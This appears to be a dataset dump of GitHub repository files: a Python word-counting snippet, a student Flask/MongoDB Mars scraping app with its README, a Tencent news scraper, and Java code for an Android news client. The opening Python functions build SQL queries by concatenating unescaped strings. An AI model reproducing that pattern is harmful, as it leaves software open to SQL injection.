-1\n finally:\n return temp\n\n\ndef get_count(cur, data, target):\n \"\"\"\n 获得某个元素在不同条件下的出现次数\n :param cur:\n :param data:\n :param target:\n :return:\n \"\"\"\n count = []\n try:\n for i in range(len(target)):\n sql = \"SELECT COUNT(content)FROM Train WHERE content='\" + data + \"' AND result='\" + target[i] + \"'\"\n num = \"\"\n temp = exe_query(cur, sql)\n for en in temp:\n num = int(en[0])\n count.append(num)\n except Exception as e:\n print(e)\n count = []\n finally:\n return count\n\n\ndef get_element(cur, sentence):\n \"\"\"\n 获得一个句子的分词结果\n :param cur:\n :param sentence:\n :return:\n \"\"\"\n element = []\n try:\n sql = \"SELECT content FROM Test WHERE sentence_id=\" + str(sentence)\n temp = exe_query(cur, sql)\n for en in temp:\n element.append(str(en[0]))\n except Exception as e:\n print(e)\n element = []\n return element\n" } ]
4
Nickguild1993/Mission_to_mars
https://github.com/Nickguild1993/Mission_to_mars
8b3e20ebc60e95bba883c66b80f3747a212f5ccc
bcba51946b207004bd02cd215ecb9bedc81d4e82
986aed90fbeba08c03003a7ef4e23ee29936d4dd
refs/heads/master
2022-12-24T06:18:42.938943
2020-10-11T22:41:48
2020-10-11T22:41:48
299,718,582
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7151514887809753, "alphanum_fraction": 0.7190303206443787, "avg_line_length": 39.45098114013672, "blob_id": "193f138ea9300d040a820e7fca17a3817e6b77f6", "content_id": "1a37e523c4c829358ecaaff941dbe955a9899c02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4125, "license_type": "no_license", "max_line_length": 130, "num_lines": 102, "path": "/app.py", "repo_name": "Nickguild1993/Mission_to_mars", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom flask_pymongo import PyMongo \nimport scraping\n\n# first line: says we'll use Flask to render a template\n# second line: says we'll use PyMongo to interact w/ mongo database\n# third line: says that to use the scraping code, we will convert from jupyter notebook to python\n\napp = Flask(__name__)\n\n# Need to tell Python how to connect to Mongo use PyMongo. \n\n# Use flask_pymongo to set up mongo connection\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_app\"\nmongo = PyMongo(app)\n\n# app.config[\"MONGO_URI\"] -> tells Python that our app will connect to MONGO using a URI (uniform resource identifier)\n# that is similiar to a URL.\n\n# mongodb://localhost:27017/mars_app is the URI we'll be using to connect our app to MONGO.\n# This URI is saying that the app can reach Mongo through our localhost server, using port 27017\n# using a database we created -> mars_app\n\n# SET UP APP ROUTES\n\n# REWIND\n# Flask routes bind URLS to functions. For example, the URL \"ourpage.com/\" \n# brings us to the homepage of our web app.\n# the URL \"ourpage.com/scrape\" will activate our scraping code.\n\n\n# DEFINE THE ROUTE FOR THE HTML PAGE.\n\[email protected](\"/\")\ndef index():\n mars = mongo.db.mars.find_one()\n return render_template(\"index.html\", mars=mars)\n\n# This route: @app.route(\"/\") tells Flask what to display when we're looking at the \n# home page, index.html(index.html is the default HTML file that we'll use to display\n# content we've scraped). \n# This means that when we visit our web app's HTML page, we will see the home page.\n\n# within the ** def index(): ** function the following is accomplished:\n\n# mars = mongo.db.mars.find_one() ->\n# uses PyMongo to find the \"mars\" collection in our database, which we will create\n# when we convert our JUPYTER scaping code to Python Script. We will also assign that\n# path to the * mars * variable for use later.\n\n# return render_template(\"index.html\") : tells FLASK to return an HTML template using an index.html file.\n\n# we'll create this file after we build the FLASK routes.\n\n# , mars=mars) : tells Python to use the \"mars\" collection in MongoDB\n\n# This function is what links our visual representation of our work, our web app, to the code that powers it.\n\n\n# This next function wll set up our SCRAPING ROUTE. This route will be the \"button\" of the web application-\n# the one that will srape updated data when we tell it from the HOMEPAGE of our web app. It'll be tied to a button that will\n# run the code when it's clicked.\n\[email protected](\"/scrape\")\ndef scrape():\n mars = mongo.db.mars\n mars_data = scraping.scrape_all()\n mars.update({}, mars_data, upsert=True)\n return \"Scraping Successful!\"\n\n# What the above ROUTE is doing.\n\n# The 1st line: @app.route(\"/scrape\") -> defines the route that FLASK will be using. \n# this route, \"/scrape\" will run the function that we create just below it.\n\n# the next lines allow us to access the database, scrape new data using our SCRAPING.PY script, update the database,\n# and return a message when successful.\n\n# more detail:\n# we assign a new VARIABLE that points to our Mongo Database: mars = mongo.db.mars\n\n# next, we created a new variable to hold the newly scraped data: mars_data = scraping.scrape_all()\n# *** here we're referencing the * SCRAPE_ALL * function in the SCRAPING.PY file exported from Jupyter Notebook. ***\n\n# Now that we've gathered new data (via scraping) we need to update the database using: .update() \n# Syntax for .update() -> .update(query_parameter, data, options)\n\n# We're inserting data, so first we need to add an empty JSON object -> {} in place of the \"query_parameter\".\n\n# Next, we'll use the data we have stored in * mars_data * in place of \"data\".\n\n# finally, the OPTION we'll include is: upsert = True. -> this indicates to Mongo to create a new document if one doesn't already\n# exist, and new data will always be saved.\n\n# Last line of function -> return \"Scraping Successful\" to let us know it worked!\n\n\n\n# Now, the final bit of code we need to add -> tell Flask to run it.\n\nif __name__ == \"__main__\":\n app.run()" }, { "alpha_fraction": 0.7622067332267761, "alphanum_fraction": 0.7672796249389648, "avg_line_length": 174.22222900390625, "blob_id": "966fd7db6905bbb4ae1ca20a04bd6b6eeda559ed", "content_id": "d1973ab33c852bc41ee6b4b76eb2a8fca55a40d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1577, "license_type": "no_license", "max_line_length": 922, "num_lines": 9, "path": "/README.md", "repo_name": "Nickguild1993/Mission_to_mars", "src_encoding": "UTF-8", "text": "# Mission to Mars \n\nI just want to start this ReadME off by going over the issues I've had to deal with to complete this challenge. I know that my webpage isn't perfect but I have spent hours upon hours both by myself, in my tutoring time, and in office hours trying to get the webpage we were scraping the hemispheres from to work. I was locked out of the webpage twice which meant I was unable to access it. Everytime I'd try to run the ```scrape new data``` button and the function it calls, it would take at least 10 tries before it returned a successful scrape (the failed attempts were server disconnects because the webpage would fail to load). Getting this to work at leats 90% of how it's supposed to has been the single most frustrating experience I've had in the course. I apologize that it's not perfect, and believe me, I have *tried so hard* to make it as good as I can get it given the obstacles I have had to deal with. \n\nPlease refer to the (4) images i uploaded for proof that the website does indeed scrape the the hemisphere images and loads them on the webpage with their respective titles (although the best I could ever get was 3 to laod- the first image in the set displayed the ```alt_tag``` I put in my HTML because it wouldn't load). There is also the image of my webpage showing a successful scrape, and the last image is of the top of my webpage in case for whatever reason, that doens't load. \n\nAgain, I'm sorry it's not perfect, but I am at my wits end trying to work with a webpage that won't load properly, no matter what I do.\n\nMod 10\n" } ]
2
jaafit/letterjam
https://github.com/jaafit/letterjam
9dbd54b70edc0c42565c44854356d3474c36a5ba
8b7499781aad2c3029f0959b046fb8448048ee0d
fed5699879a660247e7cc9f26fcc8cfa5823d563
refs/heads/master
2020-11-25T05:05:31.923433
2019-12-17T02:11:20
2019-12-17T02:11:20
228,513,551
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5239385962486267, "alphanum_fraction": 0.5401987433433533, "avg_line_length": 22.08333396911621, "blob_id": "c7ea3d3a8de87d34847e314491c3fe35e2645172", "content_id": "33baf64f57a0a5d701dd7e075502c087cf29c330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1107, "license_type": "no_license", "max_line_length": 51, "num_lines": 48, "path": "/makedict.py", "repo_name": "jaafit/letterjam", "src_encoding": "UTF-8", "text": "#!/bin/python2.7\nimport re\n\ndef bsearch(arr,element):\n start_index = 0\n last_index = len(arr)-1\n while (start_index <= last_index):\n mid =(int)(start_index+last_index)/2\n if (element>arr[mid]):\n start_index = mid+1\n elif (element<arr[mid]):\n last_index = mid-1\n elif (element == arr[mid]):\n return mid\n return -1\n\n\nwith open('TWL06.txt') as twl:\n dictionary = twl.readlines()\n\nfor i in range(len(dictionary)):\n dictionary[i] = dictionary[i].strip()\n\nthirtyk = []\nregex = re.compile(r'^([a-z]*)\\t.*\\n')\n\nwith open('count_1w.txt') as common:\n for line in common:\n\n line = regex.sub(r'\\1', line)\n if bsearch(dictionary, line.upper()) != -1:\n print line\n thirtyk.append(line)\n \n if len(thirtyk) >= 50000:\n break\n\nthirtyk.sort()\n\nwith open('mywords.json', 'w') as thelist:\n thelist.write('{\"words\":[')\n for i, line in enumerate(thirtyk):\n #print 'i',i\n if i:\n thelist.write(',')\n thelist.write('\"%s\"'%line)\n\n thelist.write(']}')" }, { "alpha_fraction": 0.5212895274162292, "alphanum_fraction": 0.5317822098731995, "avg_line_length": 25.413654327392578, "blob_id": "a966e77af46e7757c5bbe88627919cde62d362ed", "content_id": "a76793e0df0bd79120dce4756976531f13254dcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6576, "license_type": "no_license", "max_line_length": 83, "num_lines": 249, "path": "/letterjam.js", "repo_name": "jaafit/letterjam", "src_encoding": "UTF-8", "text": "var PLAYERCOUNT = 4\nfunction setPlayerCount(pc) {\n PLAYERCOUNT = pc\n}\n\nvar LJALPHABET = 'abcdefghiklmnoprstuwy'\nvar ALPHABET = 'abcdefghijklmnopqrstuvwxyz'\n\n\nfunction reqListener(e) {\n WORDS = JSON.parse(this.responseText);\n WORDS = WORDS.words\n window.localStorage.setItem('WORDS', JSON.stringify(WORDS))\n console.log('loaded')\n startgame()\n}\nvar WORDS = window.localStorage.getItem('WORDS')\nif (WORDS)\n WORDS = JSON.parse(WORDS)\nelse {\n var oReq = new XMLHttpRequest();\n oReq.onload = reqListener;\n oReq.open(\"get\", \"https://www.eatifketo.com/lj/mywords.json\", true);\n oReq.send();\n}\n\n\nvar counts = '4a 2b 3c 3d 6e 2f 2g 3h 4i 2k 3l 2m 3n 4o 2p 4r 4s 4t 3u 2w 2y'\ncounts = counts.split(' ')\nvar CARDS = []\ncounts.forEach(function(c) {\n for (var i = 0; i < c[0]; i++) {\n CARDS.push(c[1])\n }\n})\n\nfunction shuffle(a) {\n var j, x, i;\n for (i = a.length - 1; i > 0; i--) {\n j = Math.floor(Math.random() * (i + 1));\n x = a[i];\n a[i] = a[j];\n a[j] = x;\n }\n return a;\n}\n\n\nfunction haswild(w) {\n for (var c = 0; c < w.length; c++) {\n if (!~LETTERS.indexOf(w[c]))\n return true\n }\n return false\n}\nfunction hastoomanywilds(w) {\n var wild = false\n for (var c = 0; c < w.length; c++) {\n if (!~LETTERS.indexOf(w[c]) && w[c] !== wild) {\n if (!wild)\n wild = w[c]\n else\n return true\n }\n }\n return false\n}\nfunction includesAplayer(w) {\n for (var c = 0; c < w.length; c++)\n if (LETTERS.indexOf(w[c]) >= PLAYERCOUNT-2)\n return true\n return false\n}\nfunction bsearch(value) {\n var firstIndex = 0,\n lastIndex = WORDS.length - 1,\n middleIndex = Math.floor((lastIndex + firstIndex)/2);\n\n while(WORDS[middleIndex] !== value && firstIndex < lastIndex)\n {\n if (value < WORDS[middleIndex])\n {\n lastIndex = middleIndex - 1;\n }\n else if (value > WORDS[middleIndex])\n {\n firstIndex = middleIndex + 1;\n }\n middleIndex = Math.floor((lastIndex + firstIndex)/2);\n }\n\n return (WORDS[middleIndex] !== value) ? -1 : middleIndex;\n}\nfunction isword(word, clue) {\n if (~word.indexOf('*')) { // has wild?\n for (var l = 0; l < ALPHABET.length; l++) {\n var subbed = word.replace(/\\*/g, LJALPHABET[l])\n if (~bsearch(subbed))\n return true\n if (subbed === clue) // we assume clue is also a valid word\n return true\n }\n return false\n }\n else\n return word === clue || ~bsearch(word)\n}\n\nfunction getleastambiguous(word, sofar) {\n\n if (sofar.length < word.length) { // are we still building this sequence?\n\n // find the next letter in the sequence that results in the least ambiguity\n var nextletter = word[sofar.length]\n var foundLetter = false\n var bestclue\n for (var i = 0; i < LETTERS.length; i++) {\n if (LETTERS[i] === nextletter) {\n foundLetter = true\n var thisclue = getleastambiguous(word, sofar.concat([i]))\n if (!bestclue || thisclue.unambiguity >= bestclue.unambiguity){\n bestclue = thisclue\n }\n }\n }\n if (foundLetter)\n return bestclue\n else {\n sofar.push(-1) // use wild\n return getleastambiguous(word, sofar)\n }\n }\n else { // sofar is a valid sequence\n var clue = {'sequence': sofar, 'unambiguity': 0, 'perspectives':{}}\n\n // score it\n for (var perspective = 0; perspective < PLAYERCOUNT-1; perspective++) {\n\n var hasMyLetter = false\n for (var s = 0; s < sofar.length; s++)\n if (sofar[s] === perspective)\n hasMyLetter = true\n if (!hasMyLetter)\n continue\n\n // go through each letter to see how many are valid\n clue.perspectives[perspective] = []\n\n for (var l = 0; l < LJALPHABET.length; l++) {\n var tryword = ''\n for (s = 0; s < clue.sequence.length; s++) {\n if (clue.sequence[s] === perspective)\n tryword += LJALPHABET[l]\n else if (clue.sequence[s] === -1)\n tryword += '*'\n else\n tryword += LETTERS[clue.sequence[s]]\n }\n\n if (isword(tryword, word)) {\n clue.perspectives[perspective].push(tryword)\n }\n }\n\n if (clue.perspectives[perspective].length)\n clue.unambiguity += 1/clue.perspectives[perspective].length\n }\n\n return clue\n }\n\n}\n\nfunction scoreclue(clueWord) {\n // count players used and npcs used\n var players = 0\n var npcs = 0\n var unusedPlayers = LETTERS.slice(0,PLAYERCOUNT-1)\n var unusedNpcs = LETTERS.slice(PLAYERCOUNT-1)\n for (var i = 0; i < clueWord.length; i++) {\n var pio = unusedPlayers.indexOf(clueWord[i])\n var npcio = unusedNpcs.indexOf(clueWord[i])\n if (~pio) {\n unusedPlayers.splice(pio,1)\n players++\n }\n else if (~npcio) {\n unusedNpcs.splice(npcio,1)\n npcs++\n }\n }\n\n // find optimal sequence for lowest ambiguity\n var clue = getleastambiguous(clueWord, [])\n clue.word = clueWord\n clue.players = players;\n clue.npcs = npcs\n clue.wild = haswild(clueWord)\n clue.score = clue.unambiguity\n clue.score += npcs * .1\n clue.score -= clue.wild ? .01 : 0\n return clue\n}\n\nvar CLUES = []\nvar LJcallback = {\n 'onFindClues': function() {}\n}\nfunction findclues() {\n if (!WORDS)\n return\n\n var valid = WORDS.filter(function(w) {\n return !hastoomanywilds(w) && includesAplayer(w)\n })\n console.log('scoring',valid.length,'clues')\n\n // score each clue\n var clues = valid.map(function(c) {\n return scoreclue(c)\n })\n\n // sort clues by score\n clues.sort(function(a,b) {\n return b.score - a.score\n })\n\n // print top 10\n CLUES = clues.slice(0,10)\n LJcallback.onFindClues()\n console.log('clues', CLUES)\n}\n\nvar STARTED = false\nvar LETTERS = []\nfunction startgame() {\n if (!WORDS || STARTED)\n return\n STARTED = true\n\n shuffle(CARDS)\n LETTERS = CARDS.slice(0,5)\n //LETTERS = ['c', 'l','u','e','s']\n \n // find valid clues\n findclues()\n\n}\nstartgame()" } ]
2
ky4910/KyNews
https://github.com/ky4910/KyNews
29ed7e80bc513cfcb41f1cd41a53c5117d9b90c2
d5ec61c7565c57abf231b6735c57412da1978e7c
b16fa18e4fff8ea3c41ab572a2e00d32d29c9a9a
refs/heads/master
2021-06-16T19:53:43.584551
2019-09-19T09:31:08
2019-09-19T09:31:08
146,187,984
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7512626051902771, "alphanum_fraction": 0.7626262903213501, "avg_line_length": 27.25, "blob_id": "cf83fd561b3f9d96b3a36478548929a850a4a4b6", "content_id": "a68b7a1eb515a3e4a6d13a1826ac5d611812ad43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 792, "license_type": "no_license", "max_line_length": 132, "num_lines": 28, "path": "/app/src/main/java/com/example/ky4910/kynews/view/fragment/MusicFragment.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.view.fragment;\n\nimport android.os.Bundle;\nimport android.support.annotation.NonNull;\nimport android.support.annotation.Nullable;\nimport android.support.v4.app.Fragment;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\n\nimport com.example.ky4910.kynews.R;\n\npublic class MusicFragment extends Fragment {\n\n public MusicFragment() {\n }\n\n @Override\n public void onCreate(@Nullable Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n }\n\n @Nullable\n @Override\n public View onCreateView(@NonNull LayoutInflater inflater, @Nullable ViewGroup container, @Nullable Bundle savedInstanceState) {\n return inflater.inflate(R.layout.fragment_music, container, false);\n }\n}\n\n" }, { "alpha_fraction": 0.6677966117858887, "alphanum_fraction": 0.6745762825012207, "avg_line_length": 27.731706619262695, "blob_id": "8d98681e01c003c1db9cf762edbfaed65c1834c6", "content_id": "68706057d1524554066a848927fbda6580bb2ccd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1282, "license_type": "no_license", "max_line_length": 109, "num_lines": 41, "path": "/otherUsage/qqNews.py", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport requests\nfrom bs4 import BeautifulSoup\n#import pymssql\n\n#推荐 https://new.qq.com/ch/rec/\n#体育 https://new.qq.com/ch/sports/\n#财经 https://new.qq.com/ch/finance/\n#军事 https://new.qq.com/ch/milite/\n#科技 https://new.qq.com/ch/tech/\n#娱乐 https://new.qq.com/ch/ent/\n#汽车 https://new.qq.com/ch/auto/\n\nurl = \"https://news.qq.com/\"\n#请求腾讯新闻URL,获取text文本\nwbdata = requests.get(url).text\nsoup = BeautifulSoup(wbdata, 'lxml')\n\n#分别获取要问,财经,娱乐新闻信息\nmajor_titles = soup.select(\"div.item.major > div.Q-tpList > div.Q-tpWrap > div.text > em.f14 > a.linkto\")\nfinance_titles = soup.select(\"div.item.finance > div.Q-tpList > div.Q-tpWrap > div.text > em.f14 > a.linkto\")\nent_titles = soup.select(\"div.item.ent > div.Q-tpList > div.Q-tpWrap > div.text > em.f14 > a.linkto\")\n\n#定义列表数组\nnews_titles = {'major':major_titles, 'finance':finance_titles, 'entertainment':ent_titles}\n\n\nfor key, value in news_titles.items():\n\tprint(\"the index\" + key) \n\tfor n in value:\n\t\ttitle = n.get_text()\n\t\tlink = n.get(\"href\")\n\t\tdata = {'标题':title, '链接':link}\n\t\ttry:\n\t\t\tprint(data)\n\t\texcept UnicodeEncodeError:\n\t\t\tprint(\"cannot print this string!\")\n\tprint('')\n\nprint ('connecting to MySQL Server...')\n\n\n" }, { "alpha_fraction": 0.6194225549697876, "alphanum_fraction": 0.6395450830459595, "avg_line_length": 27.575000762939453, "blob_id": "b3b67bf9ce8704d0c496b48a6e878048fdbbf83a", "content_id": "dfcbbeb301bf33d393326771bdb32d108cf51750", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1143, "license_type": "no_license", "max_line_length": 83, "num_lines": 40, "path": "/app/src/main/java/com/example/ky4910/kynews/adapter/NewsFragmentPageAdapter.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.adapter;\n\nimport android.support.v4.app.Fragment;\nimport android.support.v4.app.FragmentManager;\nimport android.support.v4.app.FragmentPagerAdapter;\n\nimport com.example.ky4910.kynews.view.fragment.NewsTypeFragment.SportsNewsFragment;\nimport com.example.ky4910.kynews.view.fragment.NewsTypeFragment.TechNewsFragment;\nimport com.example.ky4910.kynews.view.fragment.NewsTypeFragment.MainNewsFragment;\n\npublic class NewsFragmentPageAdapter extends FragmentPagerAdapter {\n\n public NewsFragmentPageAdapter(FragmentManager fm) {\n super(fm);\n }\n\n @Override\n public Fragment getItem(int position) {\n Fragment fragment = null;\n switch (position) {\n case 0:\n fragment = new MainNewsFragment();\n break;\n case 1:\n fragment = new SportsNewsFragment();\n break;\n case 2:\n fragment = new TechNewsFragment();\n break;\n default:\n break;\n }\n return fragment;\n }\n\n @Override\n public int getCount() {\n return 3;\n }\n}\n" }, { "alpha_fraction": 0.730088472366333, "alphanum_fraction": 0.7654867172241211, "avg_line_length": 36.66666793823242, "blob_id": "d5fbc7be6a31037b5bf4f04088d687be8237430b", "content_id": "609f598436a0cab385b57a1614b2da9ca4329708", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 226, "license_type": "no_license", "max_line_length": 144, "num_lines": 6, "path": "/README.md", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "# KyNews\nThe news client developed by kimber\n\nImitate parts of Tencent News APP\n\n![image](https://github.com/ky4910/KyNews/blob/master/Gif/GIF_News.gif) ![image](https://github.com/ky4910/KyNews/blob/master/Gif/GIF_Video.gif)\n" }, { "alpha_fraction": 0.6611804962158203, "alphanum_fraction": 0.6677071452140808, "avg_line_length": 34.95918273925781, "blob_id": "53604a5e8db54081b5804fbb843d26af2d798292", "content_id": "9bf8858c3e52f2c68ade27ac5984576db8d93eeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3534, "license_type": "no_license", "max_line_length": 102, "num_lines": 98, "path": "/app/src/main/java/com/example/ky4910/kynews/adapter/TechNewsRvAdapter.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.adapter;\n\nimport android.content.Context;\nimport android.support.annotation.NonNull;\nimport android.support.v7.widget.RecyclerView;\nimport android.util.Log;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.widget.ImageView;\nimport android.widget.TextView;\n\nimport com.bumptech.glide.Glide;\nimport com.bumptech.glide.request.RequestOptions;\nimport com.example.ky4910.kynews.R;\nimport com.example.ky4910.kynews.model.entity.NewsBean;\nimport com.example.ky4910.kynews.utils.PubtimeConverter;\n\nimport java.util.List;\n\nimport butterknife.BindView;\nimport butterknife.ButterKnife;\n\npublic class TechNewsRvAdapter extends RecyclerView.Adapter<TechNewsRvAdapter.ViewHolder> {\n\n private Context mContext;\n private List<NewsBean.DataBean.ListBean> listBeans;\n private LayoutInflater mLayoutInflater;\n private OnItemClickListener mOnItemClickListener;\n\n public interface OnItemClickListener {\n void onItemClicked(View view, int position);\n }\n\n public void setOnItemClickListener(OnItemClickListener clickListener) {\n this.mOnItemClickListener = clickListener;\n }\n\n public TechNewsRvAdapter(Context context, List<NewsBean.DataBean.ListBean> listBeans) {\n this.mContext = context;\n this.listBeans = listBeans;\n mLayoutInflater = LayoutInflater.from(context);\n }\n\n @NonNull\n @Override\n public ViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {\n View view = mLayoutInflater.inflate(R.layout.news_item, null);\n ViewHolder viewHolder = new ViewHolder(view, mOnItemClickListener);\n return viewHolder;\n }\n\n @Override\n public void onBindViewHolder(@NonNull ViewHolder holder, int position) {\n NewsBean.DataBean.ListBean listBean = listBeans.get(position);\n RequestOptions options = new RequestOptions()\n .placeholder(R.drawable.default_img)\n .error(R.drawable.default_img)\n .override(336, 210);\n Glide.with(mContext).load(listBean.getHeadpic()).apply(options).into(holder.imageView);\n holder.textTitle.setText(listBean.getTitle());\n Log.i(\"kimber\", \"pubTime is \" + listBean.getPub_time() + \"\\n\"\n + \"title is \" + listBean.getTitle());\n String realTime = PubtimeConverter.pubtimeToDate(String.format(\"%s\", listBean.getPub_time()));\n holder.textTime.setText(realTime);\n }\n\n @Override\n public int getItemCount() {\n return listBeans.size();\n }\n\n public static class ViewHolder extends RecyclerView.ViewHolder {\n @BindView(R.id.news_image)\n ImageView imageView;\n @BindView(R.id.news_title)\n TextView textTitle;\n @BindView(R.id.news_time)\n TextView textTime;\n\n public ViewHolder(View itemView, final OnItemClickListener onClickListener) {\n super(itemView);\n itemView.setOnClickListener(new View.OnClickListener(){\n @Override\n public void onClick(View view) {\n if (onClickListener != null) {\n int position = getAdapterPosition();\n //确保position值有效\n if (position != RecyclerView.NO_POSITION) {\n onClickListener.onItemClicked(view, position);\n }\n }\n }\n });\n ButterKnife.bind(this, itemView);\n }\n }\n}\n" }, { "alpha_fraction": 0.653605043888092, "alphanum_fraction": 0.6692789793014526, "avg_line_length": 30.899999618530273, "blob_id": "8a1e74cc9b631a8e66069aa538fac9f3a8a1b4a6", "content_id": "ab41e0a0cf412ffa7c98d2ea2df75f0d48cb9318", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 666, "license_type": "no_license", "max_line_length": 89, "num_lines": 20, "path": "/app/src/main/java/com/example/ky4910/kynews/utils/PubtimeConverter.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.utils;\n\nimport java.text.SimpleDateFormat;\nimport java.util.Date;\nimport java.util.Locale;\n\npublic class PubtimeConverter {\n\n /* Genymotion模拟器的时间戳转换会出现偏差(About 12 hours) */\n public static String pubtimeToDate(String s) {\n String res;\n SimpleDateFormat simpleDateFormat = new SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss\",\n Locale.ENGLISH);\n long lt = Long.valueOf(s);\n res = simpleDateFormat.format(new Date(Long.parseLong(String.valueOf(lt*1000))));\n //Date date = new Date(lt);\n //res = simpleDateFormat.format(date);\n return res;\n }\n}\n" }, { "alpha_fraction": 0.7042156457901001, "alphanum_fraction": 0.713890790939331, "avg_line_length": 33.4523811340332, "blob_id": "e4f13475cedaac2f89e36f9fc5611f878cc4f300", "content_id": "30b4020ebd916758370b42937fd5fcdfb4f94835", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2894, "license_type": "no_license", "max_line_length": 102, "num_lines": 84, "path": "/app/src/main/java/com/example/ky4910/kynews/adapter/VideoRvAdapter.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.adapter;\n\nimport android.content.Context;\nimport android.support.annotation.NonNull;\nimport android.support.v7.widget.RecyclerView;\nimport android.util.Log;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.widget.LinearLayout;\nimport android.widget.TextView;\n\nimport com.example.ky4910.kynews.R;\nimport com.example.ky4910.kynews.model.entity.VideoBean;\nimport com.example.ky4910.kynews.utils.KyVideoPlayer;\nimport com.example.ky4910.kynews.utils.KyVideoPlayerController;\nimport com.example.ky4910.kynews.utils.VideoUtil;\n\nimport java.util.List;\n\nimport butterknife.BindView;\nimport butterknife.ButterKnife;\n\npublic class VideoRvAdapter extends RecyclerView.Adapter<VideoRvAdapter.MyViewHolder> {\n\n private Context mContext;\n private List<VideoBean> videosBeanList;\n\n public static final String TAG = \"VIDEO_RV_ADAPTER\";\n\n public VideoRvAdapter(Context context, List<VideoBean> videoBeans) {\n this.mContext = context;\n this.videosBeanList = videoBeans;\n }\n\n @NonNull\n @Override\n public MyViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {\n View itemView = LayoutInflater.from(mContext).inflate(R.layout.video_item, null);\n MyViewHolder myViewHolder = new MyViewHolder(itemView);\n KyVideoPlayerController videoController = new KyVideoPlayerController(mContext);\n try {\n myViewHolder.setController(videoController);\n } catch (Exception e){\n Log.e(TAG, e.getMessage());\n }\n\n return myViewHolder;\n }\n\n @Override\n public void onBindViewHolder(@NonNull MyViewHolder holder, int position) {\n holder.bindData(videosBeanList.get(position));\n }\n\n @Override\n public int getItemCount() {\n return videosBeanList.size();\n }\n\n class MyViewHolder extends RecyclerView.ViewHolder{\n\n private KyVideoPlayer mVideoPlayer;\n private KyVideoPlayerController mVideoController;\n\n private MyViewHolder(View itemView) {\n super(itemView);\n mVideoPlayer = itemView.findViewById(R.id.ky_video_player);\n LinearLayout.LayoutParams lp = (LinearLayout.LayoutParams) mVideoPlayer.getLayoutParams();\n lp.width = VideoUtil.getScreenWidth(mContext);\n lp.height = (VideoUtil.getScreenWidth(mContext) * 9)/16;\n mVideoPlayer.setLayoutParams(lp);\n }\n private void setController(KyVideoPlayerController controller) {\n mVideoController = controller;\n }\n private void bindData(VideoBean videos) {\n mVideoController.setTitle(videos.getTitle());\n mVideoController.setImage(videos.getImageUrl());\n mVideoPlayer.setController(mVideoController);\n mVideoPlayer.setUp(videos.getVideoUrl(), null);\n }\n }\n}\n" }, { "alpha_fraction": 0.6124638915061951, "alphanum_fraction": 0.6162997484207153, "avg_line_length": 32.127071380615234, "blob_id": "e83d04378bccae9b1e666eb1f0a16d00134c14f4", "content_id": "713922a200ff9e27389685e1efbb7bb24aedba18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 18724, "license_type": "no_license", "max_line_length": 101, "num_lines": 543, "path": "/app/src/main/java/com/example/ky4910/kynews/utils/KyVideoPlayer.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.utils;\n\nimport android.app.Activity;\nimport android.content.Context;\nimport android.content.pm.ActivityInfo;\nimport android.graphics.Color;\nimport android.graphics.SurfaceTexture;\nimport android.media.AudioManager;\nimport android.media.MediaPlayer;\nimport android.net.Uri;\nimport android.util.AttributeSet;\nimport android.view.Gravity;\nimport android.view.MotionEvent;\nimport android.view.Surface;\nimport android.view.TextureView;\nimport android.view.ViewGroup;\nimport android.view.WindowManager;\nimport android.widget.FrameLayout;\nimport android.widget.RelativeLayout;\n\nimport java.io.IOException;\nimport java.util.Map;\nimport java.util.jar.Attributes;\n\npublic class KyVideoPlayer extends FrameLayout\n implements KyVideoPlayerControl,\n TextureView.SurfaceTextureListener {\n\n public static final int STATE_ERROR = -1; // 播放错误\n public static final int STATE_IDLE = 0; // 播放未开始\n public static final int STATE_PREPARING = 1; // 播放准备中\n public static final int STATE_PREPARED = 2; // 播放准备就绪\n public static final int STATE_PLAYING = 3; // 正在播放\n public static final int STATE_PAUSED = 4; // 暂停播放\n /**\n * 正在缓冲(播放器正在播放时,缓冲区数据不足,进行缓冲,缓冲区数据足够后恢复播放)\n **/\n public static final int STATE_BUFFERING_PLAYING = 5;\n /**\n * 正在缓冲(播放器正在播放时,缓冲区数据不足,进行缓冲,此时暂停播放器,继续缓冲,缓冲区数据足够后恢复暂停)\n 